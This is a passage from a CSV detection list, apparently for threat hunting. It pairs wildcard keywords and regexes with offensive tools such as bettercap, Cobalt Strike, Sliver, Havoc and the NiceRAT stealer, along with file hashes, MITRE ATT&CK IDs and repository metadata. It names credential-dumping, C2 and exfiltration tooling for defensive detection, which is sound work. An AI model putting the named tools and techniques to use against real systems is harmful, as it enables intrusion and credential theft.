tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","277","87","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z" "*bettercap *",".{0,1000}bettercap\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap -iface eth0*",".{0,1000}bettercap\s\-iface\seth0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bettercap.*",".{0,1000}bettercap\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap_.deb*",".{0,1000}bettercap_\.deb.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network 
Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap-master.zip*",".{0,1000}bettercap\-master\.zip.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*betterdefaultpasslist*",".{0,1000}betterdefaultpasslist.{0,1000}","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","589","153","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z" "*BetterSafetyKatz.*",".{0,1000}BetterSafetyKatz\..{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BetterXencrypt.ps1*",".{0,1000}BetterXencrypt\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03*",".{0,1000}bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5*",".{0,1000}bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270*",".{0,1000}bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a*",".{0,1000}bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa*",".{0,1000}bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*",".{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" 
"*bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1*",".{0,1000}bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f*",".{0,1000}bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922*",".{0,1000}bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d*",".{0,1000}bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*bfnaelmomeimhlpmgjnjophhpkkoljpa*",".{0,1000}bfnaelmomeimhlpmgjnjophhpkkoljpa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bgetprivs*",".{0,1000}bgetprivs.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bhashdump*",".{0,1000}bhashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bhd_enum_dconly*",".{0,1000}bhd_enum_dconly.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bhghoamapcdpbohphigoooaddinpkbai*",".{0,1000}bhghoamapcdpbohphigoooaddinpkbai.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bhhhlbepdkbapadjdnnojkbgioiodbic*",".{0,1000}bhhhlbepdkbapadjdnnojkbgioiodbic.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bHNhc3MuZXhl*",".{0,1000}bHNhc3MuZXhl.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","base64 lsass.exe","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*bhttp_x64.dll*",".{0,1000}bhttp_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 
T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*",".{0,1000}bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bigb0sss/goPassGen*",".{0,1000}bigb0sss\/goPassGen.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*bin/*/PS2EXE/*",".{0,1000}bin\/.{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/addusertogroup.x64*",".{0,1000}bin\/addusertogroup\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" 
"*bin/bof_c.o*",".{0,1000}bin\/bof_c\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/bof_nim.o*",".{0,1000}bin\/bof_nim\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/dll/merlin.c*",".{0,1000}bin\/dll\/merlin\.c.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*bin/icmpsh/*",".{0,1000}bin\/icmpsh\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/iodine*",".{0,1000}bin\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*bin/ldd2pretty*",".{0,1000}bin\/ldd2pretty.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*bin/ligolo*",".{0,1000}bin\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*bin/localrelay*",".{0,1000}bin\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*bin/masscan*",".{0,1000}bin\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*bin/merlinAgent*",".{0,1000}bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*bin/PELoader.exe*",".{0,1000}bin\/PELoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*bin/setoolkit*",".{0,1000}bin\/setoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*bin/setuserpass.x64*",".{0,1000}bin\/setuserpass\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*bin/SillyRAT/*",".{0,1000}bin\/SillyRAT\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/stardust.x64.bin*",".{0,1000}bin\/stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*bin/striker*",".{0,1000}bin\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*bin/void.zip*",".{0,1000}bin\/void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Bin\bin32\zlibwapi.dll*",".{0,1000}Bin\\bin32\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 